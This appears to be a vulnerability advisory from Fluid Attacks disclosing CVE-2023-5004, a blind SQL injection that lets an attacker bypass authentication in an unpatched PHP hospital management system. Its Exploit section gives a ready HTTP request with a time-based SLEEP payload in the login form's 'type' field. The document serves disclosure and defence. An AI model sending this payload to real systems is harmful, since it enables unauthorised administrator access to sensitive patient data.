---
slug: advisories/alcocer/
title: Hospital-management-system-in-php 378c157 - Blind SQL Injection
authors: Carlos Bello
writer: cbello
codename: alcocer
product: Hospital-management-system-in-php 378c157 - Blind SQL Injection
date: 2023-09-28 12:00 COT
cveid: CVE-2023-5004
severity: 8.4
description: Hospital-management-system-in-php 378c157 - Blind SQL Injection
keywords: Fluid Attacks, Security, Vulnerabilities, SQLI, Hospital Managment System, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Hospital-management-system-in-php 378c157 - Blind SQL Injection"
    code="[Alcocer](https://de.wikipedia.org/wiki/Gibran_Alcocer)"
    product="Hospital Management System"
    affected-versions="Version 378c157"
    fixed-versions=""
    state="Public"
    release="2023-09-28">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="SQL injection"
    rule="[146. SQL injection](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-146)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    score="9.8"
    available="Yes"
    id="[CVE-2023-5004](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5004)">
</vulnerability-table>

## Description

Hospital management system version 378c157 allows to bypass authentication.
This is possible because the application is vulnerable to SQLI.

## Vulnerability

A sql injection (SQLI) vulnerability has been identified in
Hospital management system. This allows bypassing authentication
and access as any user, in this case administrator.

## Exploit

```txt
POST /hospital/hms-staff.php HTTP/1.1
Host: vulnerable.com
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=p77e9snm8g836b5lar3qb6l8ahj
Connection: close

email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
```

## Evidence of exploitation

![burpsuite](https://user-images.githubusercontent.com/51862990/268390903-bc5a419c-f00a-47e5-a7d0-82eebda199b0.png)

![sqlmap](https://user-images.githubusercontent.com/51862990/268390996-b3e24b9a-88cb-43fa-a015-50cff901ef96.png)

## Our security policy

We have reserved the ID CVE-2023-5004 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: hospital-management-system-in-php 378c157

* Operating System: GNU/Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/projectworldsofficial/hospital-management-system-in-php/>

## Timeline

<time-lapse
  discovered="2023-09-15"
  contacted="2023-09-15"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-09-28">
</time-lapse>
